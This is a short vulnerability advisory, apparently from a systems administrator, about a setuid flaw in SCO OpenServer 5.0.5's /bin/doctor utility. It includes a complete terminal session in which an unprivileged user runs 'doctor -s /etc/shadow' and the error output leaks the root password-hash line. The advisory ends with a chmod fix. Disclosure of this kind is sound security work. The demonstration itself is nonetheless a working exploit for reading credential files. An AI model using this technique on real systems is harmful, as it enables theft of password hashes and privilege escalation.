INFO:
There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow). Example:
scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$
And so on.
FIX:
Just chmod -s until SCO comes out with a fix. Although I certianly won't be changing it back to suid root anytime soon. If a hole like this exists, there are undoubtedly countless more lurking within.
Brock Tellier
Systems Administrator
Webley Systems
